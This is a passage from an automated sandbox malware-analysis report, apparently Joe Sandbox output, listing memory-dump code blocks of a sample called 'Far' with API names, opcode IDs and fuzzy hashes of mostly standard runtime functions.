                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 88ab99aa87087ad1a70f3e83b75018af7658d158f870478646eef4fc27f1698c
                                                                                                                                                                      • Instruction ID: 3bb56fafdb5ee8d17568af92b20126d032499d96265782d12240ae6ab0e496a9
                                                                                                                                                                      • Opcode Fuzzy Hash: 88ab99aa87087ad1a70f3e83b75018af7658d158f870478646eef4fc27f1698c
                                                                                                                                                                      • Instruction Fuzzy Hash: E8216821E1C68A92EA11BFA1940127DE2A4FF85F94F844031EACD5B786FF7CD851A760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FF73D05D3E1,?,00007FF73D044D38,?,?,?,00007FF73D04109E), ref: 00007FF73D05D41F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FullNamePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 608056474-0
                                                                                                                                                                      • Opcode ID: a8a5c42c0e559ad8975266ed99cfad1825e8ea03dea72994fda0d1a736c72af8
                                                                                                                                                                      • Instruction ID: 8ecd142d62acc6dae559c2f3832ba2e009c7b228890059f58555e43f810fa3f1
                                                                                                                                                                      • Opcode Fuzzy Hash: a8a5c42c0e559ad8975266ed99cfad1825e8ea03dea72994fda0d1a736c72af8
                                                                                                                                                                      • Instruction Fuzzy Hash: 7821D3A2B0C646A2EA20AE95D4445A9A265FB44FF0BD48332DE3D037C4EF2CE405D720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3964851224-0
                                                                                                                                                                      • Opcode ID: 56393265e315f6ff5f2de10b045bb79311e4ca45e2a59672c8d0e507381c0e1d
                                                                                                                                                                      • Instruction ID: d13c5dccad829d053316144ed525c27f624395b4dfe12c750fa5f433042057b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 56393265e315f6ff5f2de10b045bb79311e4ca45e2a59672c8d0e507381c0e1d
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F115163B2C525A5F700FBA0E8859EDA330BB44B98FC04531DE0D57699EF38D545D760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8a4e07173e9f7574589059edf82f2461b7aae2439eb3de9887c313aaa57e5450
                                                                                                                                                                      • Instruction ID: 2499c05badc2138d1ef3dbc8dae80f8e34be908dfefda067315ce517e41009ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a4e07173e9f7574589059edf82f2461b7aae2439eb3de9887c313aaa57e5450
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A114F7291C78EA6EA05BF94E5412BDB7A0FB80B50FD04136D64D062D5EFBCD011EB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: e6747fa68c83f02aa5b61b159413dda23bc7a61a72d626830e83826ae3701ea6
                                                                                                                                                                      • Instruction ID: e8bdd0dcbe19611bd4ef160053e5ba5c05f6f3bce9bf7383db8d532e9ba314a9
                                                                                                                                                                      • Opcode Fuzzy Hash: e6747fa68c83f02aa5b61b159413dda23bc7a61a72d626830e83826ae3701ea6
                                                                                                                                                                      • Instruction Fuzzy Hash: FE018F21F0D24E61FE15BAFA942127891509F84F74FA40230E96D4F2C3FF2CE802A221
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                      • Opcode ID: 20c6f65d1df3769074f460e468364357190ae2640d200faa11f6914117d46d50
                                                                                                                                                                      • Instruction ID: 4ca4d2bffe05feffc28811533c351f76a4d01ef319e3d8061aa2764ba73e4bad
                                                                                                                                                                      • Opcode Fuzzy Hash: 20c6f65d1df3769074f460e468364357190ae2640d200faa11f6914117d46d50
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F018022B0C68691EA10EFA6E45416EE361FB89FC4F848031EE8D4FB5ADF2CD5419710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5fbfccecc71f82971e57ac689462e9fba0fd08a016eea3ffd4428c8df8cfa77b
                                                                                                                                                                      • Instruction ID: 2d4bd6d10a1a4a658e167fefc7dbe047d5faae53ff68b21c58ee313192872302
                                                                                                                                                                      • Opcode Fuzzy Hash: 5fbfccecc71f82971e57ac689462e9fba0fd08a016eea3ffd4428c8df8cfa77b
                                                                                                                                                                      • Instruction Fuzzy Hash: 64F0B431A0C24F62F915B7FAA40117AE280AF40FA4F944130F99D8B2C7FF2CE452A631
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: f78054f7d5eb678538994d018b0a8887c356fc70a8ca24674a5b233fb00b8835
                                                                                                                                                                      • Instruction ID: 01b2dd3bf7757e9a59fc8a25becfa08a2785326b8da8c8f67a5c0dbd52c880a9
                                                                                                                                                                      • Opcode Fuzzy Hash: f78054f7d5eb678538994d018b0a8887c356fc70a8ca24674a5b233fb00b8835
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF0BB21B1C28AA1E750B7E5A84507ED150FF84FD0FC09534FA5D8B697FF5CD4405620
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                      • Opcode ID: 27d70fe15cedb91f0c707eda54446ee438f458e61c4bcc142ec35e77f27a51d7
                                                                                                                                                                      • Instruction ID: 22da6b72fb897eb08b55898b477a3b292e0f04c5277cd83d6164bd58d0532d45
                                                                                                                                                                      • Opcode Fuzzy Hash: 27d70fe15cedb91f0c707eda54446ee438f458e61c4bcc142ec35e77f27a51d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0BB62E0D14965FB62ABF1E0003BD9585EF84F68F844432CF0D01595DF3CE4D66321
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: eef746bd789527b658435af8f875a880969933daf181347e339721a05b8d246f
                                                                                                                                                                      • Instruction ID: 504365a0804334f4ebac9f3c680b78073a2b2c0f538846c603474daca245e4a0
                                                                                                                                                                      • Opcode Fuzzy Hash: eef746bd789527b658435af8f875a880969933daf181347e339721a05b8d246f
                                                                                                                                                                      • Instruction Fuzzy Hash: 39F09061E1D68E61FA517AF498461B9A290BF80B60F804234F92D4B2C2FF2CE441AA30
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: cd862a4a8f5d34af88c681f93c50cdcba01ed7047e169143b66042da92cecb3b
                                                                                                                                                                      • Instruction ID: 5fa2203e440890a5da720f665b3f84d535c0d12860c2f167a32d5f164c7eacc4
                                                                                                                                                                      • Opcode Fuzzy Hash: cd862a4a8f5d34af88c681f93c50cdcba01ed7047e169143b66042da92cecb3b
                                                                                                                                                                      • Instruction Fuzzy Hash: 22F03A00F0D28A75FE54BAE168516B592809F44F65F884234F82E8A6C6FF6CE440A134
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: e573bc09bc07a92afcb742b639a9cfa09fa1281bfd06aa140fa3c949f6d2b161
                                                                                                                                                                      • Instruction ID: 3b7e027234b693f659ee7b3698805cb65e19efea0c55c420d0c532a71ab7e257
                                                                                                                                                                      • Opcode Fuzzy Hash: e573bc09bc07a92afcb742b639a9cfa09fa1281bfd06aa140fa3c949f6d2b161
                                                                                                                                                                      • Instruction Fuzzy Hash: DEF05E52A0DA0996FF19EFF1D05533C6360BB54F08F940530DE0E4A289EF6CD468A365
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolockfread_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3465328306-0
                                                                                                                                                                      • Opcode ID: ee1277ce7a7d8f2a09b78b2797085459d396215e70b35cbba145e6d31d2a724c
                                                                                                                                                                      • Instruction ID: 66c293f7a503da3d246383f7aa69ecba39ab31503cc2245a99e10e14fbf5b1cc
                                                                                                                                                                      • Opcode Fuzzy Hash: ee1277ce7a7d8f2a09b78b2797085459d396215e70b35cbba145e6d31d2a724c
                                                                                                                                                                      • Instruction Fuzzy Hash: B8E0E592A2CA8992DB049BA3D041B6D9320F7A5FC8F101021FE4E0B750DF3DC549D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF73D06519C
                                                                                                                                                                        • Part of subcall function 00007FF73D065B48: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF73D065B51
                                                                                                                                                                        • Part of subcall function 00007FF73D065B48: _CxxThrowException.LIBVCRUNTIME ref: 00007FF73D065B62
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1680350287-0
                                                                                                                                                                      • Opcode ID: 0478e6662ed36811baf1c6c7577958fa3f74e809c5628010e8f9886d45ebdaf5
                                                                                                                                                                      • Instruction ID: 811643d825648f0cc0297e2f1337b2a37dc397bea3904da3766e4d3745821e1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0478e6662ed36811baf1c6c7577958fa3f74e809c5628010e8f9886d45ebdaf5
                                                                                                                                                                      • Instruction Fuzzy Hash: DEE09240F1E10F61FD2972E219191B9C1848F19B70EAC2B34E93D0A6C2BF1CA451A170
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3667716007-0
                                                                                                                                                                      • Opcode ID: 9762e545bb75ebbb67050f253b42ab6f247ccbd827f2feb79cb7ebf54098b814
                                                                                                                                                                      • Instruction ID: 34c55dc99f1b5e3be23af5c6d5151d82911d6712c6e827391f4495b4ddc16f57
                                                                                                                                                                      • Opcode Fuzzy Hash: 9762e545bb75ebbb67050f253b42ab6f247ccbd827f2feb79cb7ebf54098b814
                                                                                                                                                                      • Instruction Fuzzy Hash: 27F03A62E1C41BB2F601F7A0F8552B9D2217F90714FC40031D50D410B2BFADE989AB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongNamePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 82841172-0
                                                                                                                                                                      • Opcode ID: 5f6aaa6cfbe3c24923cdee33309bfe9c3cac53bb77bb73289929cf9aa5a34b93
                                                                                                                                                                      • Instruction ID: 2c628b6a3e359fadb81ab7efc36e370af20b369bf60ff3b14e03b1670d32194e
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f6aaa6cfbe3c24923cdee33309bfe9c3cac53bb77bb73289929cf9aa5a34b93
                                                                                                                                                                      • Instruction Fuzzy Hash: E6E0D822B0C745A1DB21A7A5F58839DA365FF4CBC4F844031EE8C43B56EE6CC5C48B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
